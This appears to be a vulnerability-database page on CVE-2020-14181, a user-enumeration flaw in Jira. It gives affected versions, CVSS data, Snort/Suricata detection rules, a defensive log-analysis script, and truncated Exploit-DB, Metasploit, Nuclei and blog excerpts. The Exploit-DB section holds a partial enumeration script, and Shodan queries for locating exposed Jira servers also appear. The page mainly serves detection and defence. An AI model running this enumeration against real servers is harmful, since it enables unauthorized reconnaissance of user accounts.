# CVE-2020-14181
Published: 2020-09-17
Priority: P2 (64) · Severity: medium · CVSS 3.1 base score: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
Exploit: public exploit available
EPSS: 99.60% (99.9th percentile)

Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.
## Affected (11 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| atlassian | data_center | < 7.13.6 | 7.13.6 |
| atlassian | data_center | >= 8.0.0 < 8.5.7 | 8.5.7 |
| atlassian | data_center | >= 8.6.0 < 8.12.0 | 8.12.0 |
| atlassian | jira | < 7.13.6 | 7.13.6 |
| atlassian | jira_server | >= 8.0.0 < unspecified | unspecified |
| atlassian | jira_server | >= 8.0.0 < 8.5.7 | 8.5.7 |
| atlassian | jira_server | >= 8.6.0 < unspecified | unspecified |
| atlassian | jira_server | >= 8.6.0 < 8.12.0 | 8.12.0 |
| atlassian | jira_server | >= unspecified < 7.13.6 | 7.13.6 |
| atlassian | jira_server | >= unspecified < 8.5.7 | 8.5.7 |
| atlassian | jira_server | >= unspecified < 8.12.0 | 8.12.0 |
## Detection & IOCs (extracted from sources)

Snort rule:

```snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Possible Jira User Enumeration Attempts (CVE-2020-14181)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/ViewUserHover.jspa?username="; fast_pattern; threshold: type limit, count 30, seconds 45, track by_src; reference:cve,2020-14181; classtype:attempted-recon; sid:2031066; rev:2; metadata:created_at 2020_10_21, cve CVE_2020_14181, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Moderate, confidence Medium, signature_severity Minor, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_10_21;)
```

Detection notes:

- Detect user enumeration attempts by monitoring for repeated GET requests to /ViewUserHover.jspa?username=; the Snort/ET rule triggers on 30 requests within 45 seconds from the same source IP.
- A vulnerable server will respond WITHOUT the string 'User does not exist' for valid usernames, and WITH it for invalid ones; differential response analysis can confirm exploitation.
- Nuclei template detection: look for HTTP 200 responses to GET /secure/ViewUserHover.jspa containing both 'user-hover-details' and 'content="JIRA"' in the response body.
- Shodan queries 'http.component:"Atlassian Jira"' and 'http.component:"atlassian jira"' can be used to identify internet-exposed Jira instances for proactive asset discovery.
- The exploit requires no authentication; any unauthenticated GET request to the endpoint with a username parameter is sufficient to probe for valid accounts.

Caveats:

- The Snort/ET rule (sid:2031066) uses a threshold of 30 requests in 45 seconds per source IP; low-and-slow enumeration campaigns below this rate will evade the rule.
- The Metasploit module was tested only on specific versions (8.4.1, 8.5.6, 8.10.1, 8.11.0); behavior on other affected versions may differ.
- The Nuclei template only confirms the endpoint is reachable and returns Jira-specific content (max-request: 1); it does not confirm active exploitation or successful enumeration.
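The detection notes above describe two things a SIEM can do with web-server logs: count username probes against /ViewUserHover.jspa per source IP in a short window, and watch for the low-and-slow campaigns that a short window misses. The following is an added example (it is not code from the advisory, the ET rule, or any of the tools listed on this page) that runs both checks over constructed access-log lines in combined-log style; the IP addresses, usernames and timestamps are invented sample data, and the log format and the `/secure/` context path are assumptions. One caveat worth knowing before tuning either check: in Suricata and Snort, `threshold: type limit, count 30, seconds 45` caps a rule at its first 30 matches per source per 45-second window rather than waiting for 30 before firing, so the per-source rate logic here is a separate SIEM-side heuristic, not a re-implementation of the rule's own semantics.

```python
"""Added example: SIEM-style detection of CVE-2020-14181 username probing.

Check 1: a source that sends >= 30 username probes within any 45 s window
         (the rate heuristic from the detection notes).
Check 2: a source that probes >= 10 *distinct* usernames within an hour,
         which still flags a scanner pacing itself below the rate threshold.
All log lines below are constructed sample data, not real traffic.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

# Combined-log-style line: client IP, timestamp, request line, status (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
ENDPOINT = "/secure/ViewUserHover.jspa"  # path from the advisory; /secure/ prefix assumed


def parse_line(line):
    """Return (ip, timestamp, username) for a GET to the hover endpoint carrying a
    username parameter, or None for any other request."""
    m = LOG_RE.match(line)
    if not m or m.group("method") != "GET":
        return None
    parts = urlsplit(m.group("uri"))
    # endswith() also matches context paths such as /jira/secure/ViewUserHover.jspa
    if not parts.path.endswith(ENDPOINT):
        return None
    usernames = parse_qs(parts.query).get("username")
    if not usernames:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT), usernames[0]


def _probes(lines):
    """All username probes in the log, oldest first: [(ts, ip, username)]."""
    recs = [r for r in map(parse_line, lines) if r is not None]
    return sorted((ts, ip, user) for ip, ts, user in recs)


def rate_offenders(lines, count=30, seconds=45):
    """Sources that sent >= `count` probes inside some sliding `seconds` window.
    A per-source deque holds only the timestamps still inside the window."""
    windows = defaultdict(deque)
    flagged = set()
    for ts, ip, _ in _probes(lines):
        q = windows[ip]
        q.append(ts)
        while ts - q[0] > timedelta(seconds=seconds):
            q.popleft()
        if len(q) >= count:
            flagged.add(ip)
    return flagged


def distinct_username_offenders(lines, min_distinct=10, seconds=3600):
    """Sources that probed >= `min_distinct` different usernames inside `seconds`.
    Rate-agnostic, so a slow scan of many accounts still stands out.
    Quadratic per source, which is fine for a batch job over hover-endpoint hits."""
    by_ip = defaultdict(list)
    for ts, ip, user in _probes(lines):
        by_ip[ip].append((ts, user))
    flagged = set()
    for ip, events in by_ip.items():
        for i, (start, _) in enumerate(events):
            seen = {u for t, u in events[i:] if t - start <= timedelta(seconds=seconds)}
            if len(seen) >= min_distinct:
                flagged.add(ip)
                break
    return flagged


def _fmt(ip, ts, uri, status=200):
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "GET {uri} HTTP/1.1" {status}'


def make_sample_log():
    """Constructed log: a fast scanner, a slow scanner and one legitimate user."""
    base = datetime(2020, 10, 21, 12, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(40):  # fast scanner: 40 probes, one per second
        lines.append(_fmt("198.51.100.7", base + timedelta(seconds=i), f"{ENDPOINT}?username=user{i}"))
    for i in range(12):  # slow scanner: one probe every two minutes, never 30 in 45 s
        lines.append(_fmt("203.0.113.9", base + timedelta(seconds=120 * i), f"{ENDPOINT}?username=acct{i}"))
    lines.append(_fmt("192.0.2.5", base, "/secure/Dashboard.jspa"))  # unrelated request
    lines.append(_fmt("192.0.2.5", base + timedelta(minutes=3), f"{ENDPOINT}?username=alice"))
    lines.append(_fmt("192.0.2.5", base + timedelta(minutes=9), f"{ENDPOINT}?username=bob"))
    lines.append(_fmt("192.0.2.5", base + timedelta(minutes=10), f"{ENDPOINT}?username=alice"))
    return lines


if __name__ == "__main__":
    log = make_sample_log()
    print("rate offenders:", sorted(rate_offenders(log)))
    print("low-and-slow offenders:", sorted(distinct_username_offenders(log)))
```

Run against real logs, the second check is the one to tune: legitimate users do hover over several colleagues' names in a day, so the distinct-username floor and window should be set from a baseline of normal hover traffic rather than from the scanner behaviour alone.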
## CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 5.3 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| nvd | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
## Suricata

ET EXPLOIT Possible Jira User Enumeration Attempts (CVE-2020-14181)
suricata · 2020-10-21 · CVSS 5.3 · MEDIUM

Rule:

```snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Possible Jira User Enumeration Attempts (CVE-2020-14181)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/ViewUserHover.jspa?username="; fast_pattern; threshold: type limit, count 30, seconds 45, track by_src; reference:cve,2020-14181; classtype:attempted-recon; sid:2031066; rev:2; metadata:created_at 2020_10_21, cve CVE_2020_14181, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Moderate, confidence Medium, signature_severity Minor, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_10_21;)
```
## Exploit-DB

Atlassian JIRA 8.11.1 - User Enumeration
exploitdb · 2021-03-10 · CVSS 5.3 · MEDIUM
```python
# Title: Atlassian JIRA 8.11.1 - User Enumeration
# Author: Dolev Farhi
# Vulnerable versions: (header line truncated in the source listing)
import os
import sys
import requests


def help():
    print('e.g. python3 script.py https://jiratarget.com usernames.txt')
    sys.exit()


if len(sys.argv) < 3:
    help()

server = sys.argv[1]
usernames = sys.argv[2]
random_user = '0x00001'  # a username that should not exist on the target

# The original wrapped os.path.exists() in try/except, which never raises;
# the check only works when its return value is tested.
if not os.path.exists(usernames):
    print(usernames, 'file does not exist.')
    sys.exit(1)


def test_vulnerable():
    # The original referenced an undefined `username` here; the probe must use random_user.
    resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, random_user))
    if 'User does not exist: {}'.format(random_user) in resp.text:
        return True
    return False


# The original compared the function object itself to False, so this check never ran.
if test_vulnerable() is False:
    print('server is not vulnerable.')
    sys.exit(1)

f = open(usernames, 'r').read()
for username in f.splitlines():
    pass  # the per-username request loop is truncated in the source listing at: resp = requests.get('{}/secur
```
## Metasploit

Jira Users Enumeration
metasploit

This module exploits an information disclosure vulnerability that allows an unauthenticated user to enumerate users in the /ViewUserHover.jspa endpoint. This only affects Jira versions < 7.13.16, 8.0.0 <= version < 8.5.7, 8.6.0 <= version < 8.11.1. Discovered by Mikhail Klyuchnikov (@__mn1__). This module has been tested on versions 8.4.1, 8.5.6, 8.10.1, 8.11.0.
## Nuclei

Jira Server and Data Center - Information Disclosure
nuclei · CVSS 5.3 · MEDIUM

Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.

Template:

```yaml
id: CVE-2020-14181

info:
  name: Jira Server and Data Center - Information Disclosure
  author: bjhulst
  severity: medium
  description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. A
# (template truncated in the source at this point)
```
## Recorded Future

Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
blogs_recorded_future · CVSS 9.6 · CRITICAL

### Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected

For years, software solutions built by Atlassian have found their way to nearly every organization's software stack. Tools such as JIRA, Confluence, Bamboo, and BitBucket are often seen playing a crucial role in various departments across enterprises.

From managing projects or handling organization-wide documentation, to hosting the very code of a product being developed by the organization, the constant reliance upon and amount of historical data held within these applications have turned them into a lucrative target for attackers, expanding the attack surface in the process.

### Historical Atlassian Vulnerabilities

Traditionally, vulnerabilities within the Atlassian software stack have originated from d